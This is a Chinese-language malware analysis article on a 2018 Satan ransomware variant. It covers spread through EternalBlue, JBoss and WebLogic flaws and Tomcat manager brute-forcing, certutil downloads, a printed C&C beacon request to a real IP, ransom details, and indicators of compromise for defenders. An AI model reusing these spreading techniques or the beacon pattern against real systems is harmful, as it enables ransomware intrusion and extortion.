勒索软件Satan使用的新技术分析

阅读量    46250 |   稿费 180

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

概述

在本文中,我们主要以勒索软件Satan为例,讲解一个先前已知的恶意软件是如何不断发展,并通过增加新技术来感染更多系统。
BleepingComputer在2017年1月首次报告了Satan勒索软件( https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/ )。最近,Satan勒索软件被确认使用了永恒之蓝漏洞在受该漏洞影响的环境下传播( https://bartblaze.blogspot.com.es/2018/04/satan-ransomware-adds-eternalblue.html )。该漏洞与此前WannaCry勒索软件所使用的漏洞相同,尽管微软已经在2017年3月修复了与永恒之蓝相关的漏洞,但显然还存在着许多脆弱的环境。
不同寻常的是,通过我们对Satan勒索软件样本的分析,发现其中不仅仅包含永恒之蓝的漏洞利用方法,同时还包含了一套更大规模的传播方法:

具体而言,我们此次分析的Satan变种还通过以下漏洞实现传播:
JBoss漏洞(CVE-2017-12149)
Weblogic漏洞(CVE-2017-10271)
永恒之蓝EternalBlue漏洞(CVE-2017-0143)
Tomcat Web应用暴力破解漏洞

 

恶意软件概况

以下是我们在2018年5月初发现的Satan勒索软件样本,使用了上一章中提到的所有技术,我们在这里将具体分析这些新技术。
文件名:sts.exe
文件大小:1.7MB
MD5:c290cd24892905fbcf3cb39929de19a5
我们在对样本的分析过程中,发现的第一件事就是该恶意软件借助MPRESS实现加壳:

该样本的主要目标是投放Satan勒索软件,对被感染用户主机进行加密,然后要求用户使用比特币支付勒索款项。随后,该样本还尝试借助永恒之蓝等漏洞在网络中传播。

永恒之蓝漏洞利用

恶意软件在被感染用户主机上投放了几个永恒之蓝相关文件。这些文件是没有经过任何修改或自定义的公开漏洞利用版本。恶意软件将相关的文件放置于被感染系统的C:UsersAll Users路径下。

通过扫描同一网段内的所有系统,sts.exe在网络内部进行传播。通过以下命令行,受SMB EternalBlue漏洞影响的系统将会执行此前投放的DLL库down64.dll。

down64.dll将尝试在目标内存中加载代码,然后使用由Microsoft发布的合法certutil.exe工具来下载sts.exe。这是一种已知的远程文件复制下载技术,在Mitre ATT&CK中编号为T1105( https://attack.mitre.org/wiki/Technique/T1105 )。

其他众多的漏洞利用

该样本还借助一些其他的网络活动,持续在网络中进行传播。
被感染系统将向/Clist1.jsp发出HTTP PUT请求,以执行jsp文件,该文件可以在目标服务器中下载另一个sts.exe样本。
同时,还存在用于感染其他系统的另外一个新型技术,该样本会识别Apache Tomcat服务器,并对其进行暴力破解。它向/manager/html发出HTTP GET请求,如果得到的响应是“401 未经授权”(401 Not Authorized),就会使用最常见的用户名和密码列表来尝试暴力破解,从而尝试获取对文件的访问权限:

加密

在同一网络中感染其他系统后,该样本最终会将Satan恶意软件投放到C:Satan.exe文件中。该可执行文件同样也使用MPRESS进行了加壳。

执行Satan.exe后,会启动勒索软件的攻击过程,首先会终止以下进程:

随后,Satan.exe创建一个名为KSession的文件,该文件位于C:WindowsTempKSession目录下,并负责存储主机标识符。
针对加密后的文件,将使用[satan_pro@mail.ru].<original_filename>.satan的格式进行重命名。然后进程开始发送数据到C&C服务器,使用存储在KSession文件中的参数值发送GET请求。

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Connection: Keep-Alive

User-Agent: Winnet Client

Host: 45.124.132.119

在加密完成后,Satan.exe在C:_How_to_decrypt_files.txt文件中使用指令创建一个赎金通知,然后运行记事本打开该通知。

赎金通知中,包含关于如何解密系统的说明,并提供了一个用于联系的电子邮件地址satan_pro[@]mail[.]ru,要求用户进行比特币付款。该通知内容如下:

我们跟踪了赎金通知中提供的比特币钱包14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo,到目前为止只收到了少量的付款,最近一次付款发生在2018年5月12日。目前,该比特币钱包中有0.5BTC的余额,在撰写本文时价值3600美元。

总结

根据目前的形势,勒索软件在一定时间内不会消失,并且它还会适应最新和更为多样化的攻击技术,以更具有创新性和成功率的方式进行传播。

 

IoC

文件哈希值:
3e3f8570c11dff0b5a0e061eae6bdd66cf9fa01d815658a0589d98873500358d
15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
b556b5c077e38dcb65d21a707c19618d02e0a65ff3f9887323728ec078660cc3
15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
93027b47ef0b6f7d933017320951bbbeef792a8f1bc43b3fe96c2b61f1dc2636
cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
db0831e19a4e3a736ea7498dadc2d6702342f75fd8f7fbae1894ee2e9738c2b4
aa8adf96fc5a7e249a6a487faaf0ed3e00c40259fdae11d4caf47a24a9d3aaed
be8eb97d8171b8c91c6bc420346f7a6d2d2f76809a667ade03c990feffadaad5
0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
50f329e034db96ba254328cd1e0f588af6126c341ed92ddf4aeb96bc76835937
aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68
b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
5f30aa2fe338191b972705412b8043b0a134cdb287d754771fc225f2309e82ee
cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682

IP地址:
45[.]124.132[.]119

URL路径:
/invoker/readonly
/orders.xhtml
/Clist1.jsp
/manager/html
/wls-wsat/CoordinatorPortType

 

致谢

最后,感谢Fernando Martinez和Chris Doman对本次研究提供的帮助。

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多